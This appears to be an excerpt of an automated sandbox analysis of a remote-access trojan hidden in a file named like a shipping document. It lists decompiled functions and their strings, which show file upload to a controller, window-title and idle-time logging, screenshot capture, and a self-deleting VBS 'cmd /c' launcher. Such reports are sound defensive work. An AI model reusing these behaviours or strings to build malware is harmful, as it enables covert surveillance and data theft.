                                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                      • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseEnumOpen
                                                      • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                      • API String ID: 1332880857-3714951968
                                                      • Opcode ID: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                      • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                      • Opcode Fuzzy Hash: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                      • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                      Function 0041CA9E Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                      • GetCursorPos.USER32(?), ref: 0041CAF8
                                                      • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                      • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                      • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                      • ExitProcess.KERNEL32 ref: 0041CB74
                                                      • CreatePopupMenu.USER32 ref: 0041CB7A
                                                      • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                      • String ID: Close
                                                      • API String ID: 1657328048-3535843008
                                                      • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                      • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                      • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                      • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                      Function 00444F3D Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$Info
                                                      • String ID:
                                                      • API String ID: 2509303402-0
                                                      • Opcode ID: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                      • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                      • Opcode Fuzzy Hash: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                      • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                      Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                      • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                      • __aulldiv.LIBCMT ref: 00407FE9
                                                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                      • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                      • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                      • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                      • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                      • API String ID: 1884690901-3066803209
                                                      • Opcode ID: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                      • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                      • Opcode Fuzzy Hash: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                      • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                      Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNEL32(00001388), ref: 00409E62
                                                        • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                        • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                        • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                        • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                      • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                        • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                      • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0040A049
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                      • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                      • API String ID: 3795512280-3163867910
                                                      • Opcode ID: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                      • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                      • Opcode Fuzzy Hash: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                      • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                      Function 0045006D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                      • _free.LIBCMT ref: 004500A6
                                                        • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                        • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                      • _free.LIBCMT ref: 004500C8
                                                      • _free.LIBCMT ref: 004500DD
                                                      • _free.LIBCMT ref: 004500E8
                                                      • _free.LIBCMT ref: 0045010A
                                                      • _free.LIBCMT ref: 0045011D
                                                      • _free.LIBCMT ref: 0045012B
                                                      • _free.LIBCMT ref: 00450136
                                                      • _free.LIBCMT ref: 0045016E
                                                      • _free.LIBCMT ref: 00450175
                                                      • _free.LIBCMT ref: 00450192
                                                      • _free.LIBCMT ref: 004501AA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                      • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                      • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                      • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                      Function 00419128 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 0041912D
                                                      • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                      • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                      • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                      • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                      • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                      • API String ID: 489098229-65789007
                                                      • Opcode ID: 91d1b4f4dea65f3b826fcaa200c07d0103cb4320fd1aa60c718ca5279f5f8068
                                                      • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                      • Opcode Fuzzy Hash: 91d1b4f4dea65f3b826fcaa200c07d0103cb4320fd1aa60c718ca5279f5f8068
                                                      • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                      Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • connect.WS2_32(?,?,?), ref: 004042A5
                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                      • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                        • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                      • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                      • API String ID: 994465650-2151626615
                                                      • Opcode ID: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                      • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                      • Opcode Fuzzy Hash: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                      • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                                                      Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                        • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                        • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                        • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                        • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                      • ExitProcess.KERNEL32 ref: 0040C832
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                      • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                      • API String ID: 1913171305-390638927
                                                      • Opcode ID: 0ceb5a7906efabe13d82fb8a69420ea189243682d85e34c24b2e68e6ac54103e
                                                      • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                      • Opcode Fuzzy Hash: 0ceb5a7906efabe13d82fb8a69420ea189243682d85e34c24b2e68e6ac54103e
                                                      • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                      Function 0044F3E1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                      • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                      • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                      • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                      Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                      • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                      • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404811
                                                      • closesocket.WS2_32(?), ref: 0040481F
                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404856
                                                      • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404867
                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 0040486E
                                                      • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404880
                                                      • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404885
                                                      • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040488A
                                                      • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404895
                                                      • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040489A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                      • String ID:
                                                      • API String ID: 3658366068-0
                                                      • Opcode ID: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                      • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                      • Opcode Fuzzy Hash: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                      • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48
                                                      Function 00454982 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                      • GetLastError.KERNEL32 ref: 00454A96
                                                      • __dosmaperr.LIBCMT ref: 00454A9D
                                                      • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                      • GetLastError.KERNEL32 ref: 00454AB3
                                                      • __dosmaperr.LIBCMT ref: 00454ABC
                                                      • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                      • CloseHandle.KERNEL32(?), ref: 00454C26
                                                      • GetLastError.KERNEL32 ref: 00454C58
                                                      • __dosmaperr.LIBCMT ref: 00454C5F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                      • String ID: H
                                                      • API String ID: 4237864984-2852464175
                                                      • Opcode ID: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                      • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                      • Opcode Fuzzy Hash: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                      • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                      Function 0040A3F4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 158sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 0040A456
                                                      • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                      • GetForegroundWindow.USER32 ref: 0040A467
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                      • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                      • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                        • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                      • String ID: [${ User has been idle for $ minutes }$]
                                                      • API String ID: 911427763-3954389425
                                                      • Opcode ID: a59f2f13793784003892e63950edf61f9792dfbe12456e4cbfe946a207096c8a
                                                      • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                      • Opcode Fuzzy Hash: a59f2f13793784003892e63950edf61f9792dfbe12456e4cbfe946a207096c8a
                                                      • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                      Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 65535$udp
                                                      • API String ID: 0-1267037602
                                                      • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                      • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                      • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                      • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                      Function 00439361 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                      • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                      • __dosmaperr.LIBCMT ref: 004393CD
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                      • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                      • __dosmaperr.LIBCMT ref: 0043940A
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                      • __dosmaperr.LIBCMT ref: 0043945E
                                                      • _free.LIBCMT ref: 0043946A
                                                      • _free.LIBCMT ref: 00439471
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                      • String ID:
                                                      • API String ID: 2441525078-0
                                                      • Opcode ID: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                      • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                      • Opcode Fuzzy Hash: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                      • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                      Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                      • TranslateMessage.USER32(?), ref: 00404F30
                                                      • DispatchMessageA.USER32(?), ref: 00404F3B
                                                      • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                      • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                      • String ID: CloseChat$DisplayMessage$GetMessage
                                                      • API String ID: 2956720200-749203953
                                                      • Opcode ID: 0622db17b8ffedd3531a9fa1e5e3f576bb625bfe4daf1fd40acc4f0bc4360242
                                                      • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                      • Opcode Fuzzy Hash: 0622db17b8ffedd3531a9fa1e5e3f576bb625bfe4daf1fd40acc4f0bc4360242
                                                      • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                      Function 00416E27 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                      • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                      • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                      • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      Strings
